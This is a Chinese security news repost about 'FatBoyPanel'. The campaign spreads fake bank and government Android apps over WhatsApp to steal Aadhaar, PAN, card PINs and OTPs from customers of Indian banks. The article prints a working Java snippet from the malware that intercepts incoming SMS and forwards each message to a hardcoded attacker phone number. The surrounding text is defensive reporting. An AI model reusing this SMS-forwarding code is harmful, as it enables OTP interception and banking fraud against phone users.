新恶意软件攻击印度银行用户,窃取Aadhar、PAN、ATM及信用卡PIN码

admin 2025年2月8日00:39:03评论40 views字数 1903阅读6分20秒阅读模式

更多全球网络安全资讯尽在邑安全

新恶意软件攻击印度银行用户,窃取Aadhar、PAN、ATM及信用卡PIN码

近日,印度出现了一种新的网络安全威胁,针对多家印度银行的用户发起了一场复杂的恶意软件攻击活动。

该活动由zLabs研究团队发现,涉及近900个恶意软件样本,旨在窃取敏感的财务和个人数据,包括Aadhar号码、PAN卡、ATM PIN码和信用卡详细信息。

此外,网络安全研究人员将此活动命名为“FatBoyPanel”。Zimperium的安全分析师指出,所有恶意软件样本均设计用于欺骗Android用户并窃取其敏感的财务和个人信息。

做法:
该恶意软件通过WhatsApp分发,伪装成合法的政府或银行应用程序的APK文件。一旦安装,这些应用程序通过模仿真实银行应用的用户界面,诱骗用户披露敏感信息。

新恶意软件攻击印度银行用户,窃取Aadhar、PAN、ATM及信用卡PIN码

恶意软件利用短信权限拦截并窃取消息,包括一次性密码(OTP),从而促成未经授权的交易。

该银行恶意软件家族有三种不同的变体:

  1. 短信转发捕获被盗短信并将其转发到攻击者控制的电话号码。

  2. Firebase数据外泄:将被盗短信外泄到Firebase端点,该端点充当命令和控制服务器。

  3. 混合型:结合上述两种技术,将被盗短信转发到电话号码和Firebase端点。

    新恶意软件攻击印度银行用户,窃取Aadhar、PAN、ATM及信用卡PIN码

允许 Banker 示例读取收到的 SMS 的代码片段

恶意软件的一个关键功能是其拦截短信的能力。以下是其捕获和转发短信的示例:

public class ReceiveSms extends BroadcastReceiver {    String androidID;    private String stringNumber;    public ReceiveSms() {        this.androidID = "'";        this.stringNumber = "+919229736554";    }    @Override // android.content.BroadcastReceiver    public void onReceive(Context context0, Intent intent0) {        this.androidID = Settings.Secure.getString(context0.getContentResolver(), "android_id");        if(intent0.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) {            Bundle bundle0 = intent0.getExtras();            if(bundle0 != null) {                try {                    Object[] arr_object = (Object[])bundle0.get("pdus");                    SmsMessage[] arr_smsMessage = new SmsMessage[arr_object.length];                    for(int v = 0; v < arr_object.length; ++v) {                        SmsMessage smsMessage0 = SmsMessage.createFromPdu(((byte[])arr_object[v]));                        arr_smsMessage[v] = smsMessage0;                        smsMessage0.getOriginatingAddress();                        String s = arr_smsMessage[v].getMessageBody();                        SmsManager.getDefault().sendTextMessage(this.stringNumber, null, s, null, null);                    }                } catch(Exception exception0) {                    exception0.printStackTrace();                }            }        }    }}

新恶意软件攻击印度银行用户,窃取Aadhar、PAN、ATM及信用卡PIN码

此活动的目标主要银行

该恶意软件活动已暴露了约50,000名用户的敏感数据,包括来自印度银行的短信、银行详细信息、卡详细信息以及政府颁发的身份信息。

目前已识别出超过1,000个用于此活动的电话号码,这些信息将与相关机构共享以追踪威胁行为者。

新恶意软件攻击印度银行用户,窃取Aadhar、PAN、ATM及信用卡PIN码

新恶意软件攻击印度银行用户,窃取Aadhar、PAN、ATM及信用卡PIN码

新恶意软件攻击印度银行用户,窃取Aadhar、PAN、ATM及信用卡PIN码

分布图

为防范潜在威胁,用户应通过仅从官方应用商店下载银行应用程序来验证应用的真实性。

确保启用多因素认证(MFA),例如使用“OTP”和“生物识别认证”。此外,对链接和附件保持警惕,避免点击可疑或来源不明的链接和附件。

因此,用户必须保持警惕并采取积极措施保护其个人和财务数据。除此之外,个人和机构都应保持信息灵通,并相应地调整其安全措施。

原文来自: 

原文链接: https://cybersecuritynews.com/new-malware-attacking-users-of-indian-banks/

原文始发于微信公众号(邑安全):新恶意软件攻击印度银行用户,窃取Aadhar、PAN、ATM及信用卡PIN码

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月8日00:39:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   新恶意软件攻击印度银行用户,窃取Aadhar、PAN、ATM及信用卡PIN码https://cn-sec.com/archives/3710691.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息